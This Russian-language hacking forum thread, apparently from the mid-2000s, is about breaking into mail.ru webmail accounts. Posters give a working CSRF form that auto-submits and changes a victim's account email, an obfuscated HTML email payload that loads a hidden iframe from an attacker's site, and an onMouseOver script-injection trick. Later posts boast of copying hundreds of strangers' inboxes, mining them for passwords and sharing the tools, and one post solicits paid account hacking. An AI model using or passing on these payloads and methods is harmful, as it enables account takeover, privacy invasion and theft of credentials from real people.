JazzzSummerMan конкретный вопрос тебе. Посоветуй как вставить скрипт в письмо, который сработает если открыть письмо на майл.ру? Было бы чудесно если бы можно было вставить скрипт посылающий куку на ваш снифер - тогда можно было бы читать емайлы почти каждоко дурака. а в переписке частенько можно наткнуться на пасворды для чего нибудь другого которые одонаковые спасвордом на майл.ру. вообщем JazzzSummerMan если ты сможешь вставить такой скрипт я тебе через день пришлю програмку которая будет копировать весь ящик жертв открывших письмо с твоим скриптом.
На любой сайт заливаешь </span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE"> <form method="post" action="http://win.mail.ru/cgi-bin/anketa" name="anketa"> <input type="hidden" name="page" value="2"> <input type="hidden" name="Email" value="hacker@antichat.ru"> <input type="hidden" value="Сохранить" name="Save"> </form> <script> document.anketa.submit(); </script> [/QUOTE]<span id='postcolor'> Само письмо отправляешь в виде html с содержанием: </span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE"> <embed src="&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58status=location;document.getElementById('xxx').innerHTML='<&#105&#102&#114&#97&#109&#101 src=http://skalpel.ru/mailscript.html width=0 height=0></&#105&#102&#114&#97&#109&#101>';this.wav" width=0 height=0> <p id='xxx'> [/QUOTE]<span id='postcolor'> Где http://skalpel.ru/mailscript.html - твой сйт с первым скриптом ... Отправляешь письмо ...
Че Гевара, JazzzSummerMan или кто нибудь уберите пожалуйста этот мой топик, он только занимает место и засоряет форум. И из другого форума про чаты тоже уберите мой свежий мусор.
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата (m0nzt3r @ августа 31 2004,23:34)</td></tr><tr><td id="QUOTE">[/QUOTE]<span id='postcolor'> ЗАЯВЛЕНИЕ Я кретин обещаю больше не забазаривться и глубоко раскаиваюсь в засорении этого форума своими бессмысленными сообщениями с безсвязанным содержаением. Я больше так не буду. Администраторы поменяйте пожалуйста мне мое поганяло на "ПОРОЖНЯК" и сотрите весь мой бред за который мне ужасно стыдно.
скальпель скрипт из письма на мэйл.ру можно запустить самым простейшим способом: <a href="xxx"onMouseOver=alert()>xxxxx</a> обрати внимание, после кавычек не должно быть пробела. и отсылать надо в формате HTML/plaintext а то были экземпляры, которые скрипт в виде текста присылали
Спасибо друг Ценю твою помощь. Но я уже раскаялся. Но не на долго. Вообще то я пошел альтернативным путем. Надеюсь через недельку как конкретно наржусь с извращенцев и загублю все извращенческие чаты я вам сообщю о своих скромных результатах.
так вот попробовал вчера я посмотреть о чем пишут посетители извращенческих чатов на майл.ру. скопировал ~70 inbox'ов этих уродов. вот некоторые статистические выводы: некоторые уроды (большинство) в чатах используют беспонтовые емайлы на которых ничего нет, только фотографии; некоторые уроды используют тот же пасворд для майл.ру и для разных других вебстраниц; удивительно но большинство педофилов - девушки и ящики у них просто забиты педофилятиной; многие уроды в реальной жизни прикидываються нормальными. к сожалению как то в извращенческих чатах не было создателей. но работа продолжается....
Скальпель, ты можешь сломать ящик mail.ru? Если да, давай попробуем договориться о цене на взлом. Если согласишься, чиркни на sotsopros@front.ru
могу помочь бескорыстно, но через 2 недели. сейчас я прикалываюсь в далеке от компьютеров. если хочешь можешь сам попробывать - мои програмки for free. но ты сможешь только посмотреть все письма и только иногда из них можно узнать пассворд.
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата (Guest @ сентября 03 2004,13:15)</td></tr><tr><td id="QUOTE">удивительно но большинство педофилов - девушки и ящики у них просто забиты педофилятиной; многие уроды в реальной жизни прикидываються нормальными. к сожалению как то в извращенческих чатах не было создателей. но работа продолжается....[/QUOTE]<span id='postcolor'> Выкладывай ники и фотки в "Юмор". Мы тоже посмеемся
Э Алгол, я же тебе писал возми на сайт мои програмки, с исходниками и если хлчешь результатами в виде 300 inbox-ов извращенцев. вот посмотришь и поприкалываешься. я уже писал, что можно так прочитать что станет не смешно. и я признаюсь сначала я сдал несколько извращенцев не ментам, но просто администраторам локальных сетей с которых они ведут переписку. я скажу честно что столько говна я сам не читал - я просто делал file search в скачаных письмах и для файла со словом пароль и так я набрал немного паролей. кроме того тебе как действительно мозгу я скажу что мне до тебя далеко но у меня есть другие новые конкретные идеи про майл ру но я сообщу попоже
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата (Guest @ сентября 17 2004,20:19)</td></tr><tr><td id="QUOTE">Э Алгол, я же тебе писал возми на сайт мои програмки, с исходниками[/QUOTE]<span id='postcolor'> Ну и что ты за это хочешь ?
хочу просто бескорыстно помочь людям приколоться Я в следующую среду вернусь к себе и пошлю тебе, только напиши свой емайл. все написано на вс++ 6.0, написано коряво, но все работает и есть только одна кнопка.
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата (Guest @ сентября 22 2004,18:36)</td></tr><tr><td id="QUOTE">хочу просто бескорыстно помочь людям приколоться Я в следующую среду вернусь к себе и пошлю тебе, только напиши свой емайл. все написано на вс++ 6.0, написано коряво, но все работает и есть только одна кнопка.[/QUOTE]<span id='postcolor'> Программа это конечно хорошо, но гораздо интересней статья на эту тему была бы... с описаловом.. что да как... исходники тоже неплохо.. А так если лень писать статью шли info@antichat.ru